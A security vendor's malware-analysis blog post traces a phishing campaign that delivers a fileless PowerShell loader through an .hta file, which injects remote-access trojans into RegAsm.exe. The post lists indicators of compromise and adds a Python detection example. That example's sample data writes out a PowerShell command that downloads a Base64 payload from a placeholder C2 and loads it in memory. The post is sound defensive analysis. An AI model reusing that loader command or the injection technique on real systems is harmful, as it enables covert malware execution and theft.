Tracking Fileless Malware Distributed Through Spam Mails

AhnLab Security Emergency response Center (ASEC) has discovered a phishing campaign that propagates through spam mails and executes a PE file (EXE) without writing the file to the user's PC. The attachment, a script with the .hta extension, ultimately executes malware strains such as AgentTesla, Remcos, and LimeRAT. This blog post explains the distribution flow from the spam mail to the final binary, as well as the techniques employed.

Figure 1 shows the body of the spam mail distributing the malware. The email is disguised as a bank transfer notice. Inside the attached ISO image file is a script file (.hta) disguised as the transfer notice (see Figure 2). An .hta file is an HTML Application script that is run by mshta.exe, a built-in Windows utility.

Figure 1. Phishing email text
Figure 2. Malicious script (.hta) within the attached iso file

Figure 3 shows evidence of the malicious .hta file being executed, as captured in an AhnLab EDR detection diagram. The diagram reveals a suspicious process tree in which mshta.exe executes cmd.exe, powershell.exe, and RegAsm.exe in sequence.

Figure 3. Evidence of the hta file being executed

Figure 4 shows the PowerShell command executed by mshta.exe. Interpreting the script's syntax shows that it requests string data from the server (DownloadString), decodes it (FromBase64String), loads the decoded bytes as an assembly (CurrentDomain.Load), and then calls a specific function ('VAI'). The binary is never written to disk as a PE file; this is a fileless method that executes it within the memory of the PowerShell process.

Figure 4. PowerShell script executed through mshta.exe (payload download and memory load features)

Figure 5 shows the data that the PowerShell script requests from the C2, retrieved here with a browser for confirmation. As the script indicates, the data turns out to be a PE file (DLL) once it is Base64-decoded.

Figure 5. Data downloaded from the C2 (encoded DLL)

Figure 6 shows the functionality of the decoded DLL: downloading the final binary from the C2 and injecting it into RegAsm.exe, a legitimate Windows process. The final malware strain is therefore run inside RegAsm.exe. Figure 7 is the EDR screen showing this DLL behavior, with PowerShell.exe injecting into RegAsm.exe. The CYBLE blog reported that Remcos, AgentTesla, LimeRAT, and others were downloaded as the final binary in this phishing campaign. [1]

Figure 6. Features of the decoded DLL (downloading the ultimate binary and injection)
Figure 7. Powershell.exe performing injection into RegAsm.exe
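The process chain and command-line markers described above (mshta.exe spawning cmd.exe and powershell.exe, a DownloadString / FromBase64String / CurrentDomain.Load loader, and powershell.exe spawning RegAsm.exe) can be turned into a simple detection over process-creation events. The following is an added example, not code from the ASEC post or AhnLab EDR; the event records, paths and the C2 hostname are constructed.

```python
# Constructed process-creation events (Sysmon Event ID 1 style fields); not from the post.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "E:\Transfer_Notice.hta"'},          # E: = mounted ISO (constructed)
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell ..."},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": ("powershell -w hidden $d=(New-Object Net.WebClient)"
             ".DownloadString('http://c2.invalid/payload.txt');"          # placeholder C2
             "[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($d))"
             ".GetType('A').GetMethod('VAI').Invoke($null,$null)")},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "cmd": "RegAsm.exe"},
    {"pid": 600, "ppid": 100,                                      # benign admin use; no alert
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Process"},
]

# Markers of the loader in the post: fetch a string, Base64-decode it, load it as an assembly.
LOADER_MARKERS = ("DownloadString", "FromBase64String", "CurrentDomain.Load")

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestors(events, pid):
    """Process images from pid up to the root, as lowercase basenames (child first)."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """Alert on the mshta -> (cmd) -> powershell loader and on powershell -> RegAsm.exe."""
    alerts = []
    for e in events:
        name, chain = basename(e["image"]), ancestors(events, e["pid"])
        # powershell.exe whose parent or grandparent is mshta.exe and whose command
        # line carries all three loader markers (case-insensitive).
        if name == "powershell.exe" and "mshta.exe" in chain[1:3]:
            if all(m.lower() in e["cmd"].lower() for m in LOADER_MARKERS):
                alerts.append(("fileless_loader", e["pid"], " <- ".join(chain)))
        # RegAsm.exe started directly by powershell.exe: the injection host seen in the post.
        if name == "regasm.exe" and len(chain) > 1 and chain[1] == "powershell.exe":
            alerts.append(("regasm_injection_host", e["pid"], " <- ".join(chain)))
    return alerts
```

Running `detect(EVENTS)` yields one alert for the loader (pid 400) and one for the RegAsm.exe child (pid 500); the benign PowerShell session (pid 600) produces none.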

In this post, ASEC covered the fileless distribution of malware through email, using evidence from EDR. The threat actor has carefully disguised the email and files as bank transfer statements, so from the contents of the email alone it is difficult to tell it apart from a legitimate one. When opening email attachments, users must check whether they contain an executable file extension that could indicate malware. They should also use security products to detect and block access by threat actors.

[IOC]

  • Behavior Detection
    Connection/EDR.Behavior.M2650
    Execution/MDP.Powershell.M10668
  • File Detection
    Downloader/Script.Generic
    Trojan/Win.Generic.R526355
  • URL & C2
    hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
    hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
  • MD5
    43e75fb2283765ebacf10135f598e98c (.hta)
    540d3bc5982322843934504ad584f370 (.dll)

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Tracking Fileless Malware Distributed Through Spam Mails appeared first on ASEC BLOG.

Article Link: https://asec.ahnlab.com/en/56512/